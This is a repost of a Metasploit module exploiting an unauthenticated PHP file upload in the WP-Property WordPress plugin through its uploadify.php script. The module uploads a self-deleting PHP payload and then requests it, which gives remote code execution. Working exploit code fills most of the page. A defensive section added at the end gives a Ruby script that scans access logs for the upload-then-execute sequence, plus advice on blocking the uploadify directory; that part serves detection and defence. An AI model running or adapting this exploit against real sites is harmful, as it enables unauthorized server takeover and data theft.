
WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30
WordPress WP-Property PHP File Upload Vulnerability

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end
```

Don't ask me what this is or how to use it. I'm talking about msf.
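For defenders, the module above leaves a recognisable trace: a successful POST to the plugin's `uploadify.php` followed by a request for a new `.php` file in the same directory. Because the payload is generated with `:unlink_self=>true`, the uploaded file may no longer be on disk, so request logs are the evidence to check. The following is an added example, not part of the original post or of Metasploit; the log format (combined), the sample lines and the `KNOWN_FILES` allowlist are assumptions.

```ruby
# Added example (defensive): find the upload-then-request sequence in access logs.
UPLOADIFY_DIR = 'wp-content/plugins/wp-property/third-party/uploadify/'
# Assumption: PHP files your copy of the plugin legitimately ships in that directory.
KNOWN_FILES = %w[uploadify.php].freeze
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<verb>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /

# Constructed sample lines in combined log format (documentation IP ranges).
SAMPLE_LOG = <<~LOG.lines
  203.0.113.7 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "-"
  203.0.113.7 - - [04/Jan/2013:19:40:02 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 71 "-" "-"
  203.0.113.7 - - [04/Jan/2013:19:40:03 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/AbCdE.php HTTP/1.1" 200 0 "-" "-"
  198.51.100.9 - - [04/Jan/2013:19:41:00 +0800] "GET /wordpress/index.php HTTP/1.1" 200 5120 "-" "-"
LOG

# Returns one hash per suspicious request, in log order.
def find_uploadify_abuse(lines)
  uploaders = {} # client IP => time of its first successful POST to uploadify.php
  findings = []
  lines.each do |line|
    m = LOG_RE.match(line) or next
    path = m[:path].split('?', 2).first
    idx = path.index(UPLOADIFY_DIR) or next
    file = path[(idx + UPLOADIFY_DIR.length)..-1]
    if m[:verb] == 'POST' && file == 'uploadify.php' && m[:status] == '200'
      uploaders[m[:ip]] ||= m[:ts]
      findings << { type: :upload, ip: m[:ip], ts: m[:ts], path: path }
    elsif file =~ /\.(php\d?|phtml)\z/i && !KNOWN_FILES.include?(file)
      # A PHP file outside the known set was requested from the upload directory.
      type = uploaders.key?(m[:ip]) ? :executed_after_upload : :unexpected_php
      findings << { type: type, ip: m[:ip], ts: m[:ts], path: path, status: m[:status] }
    end
  end
  findings
end

find_uploadify_abuse(SAMPLE_LOG).each { |f| puts f.inspect } if __FILE__ == $PROGRAM_NAME
```

Any `:upload` hit on a site that does not use the plugin's uploader is worth investigating on its own, and removing or blocking access to the `third-party/uploadify/` directory closes the path the module relies on.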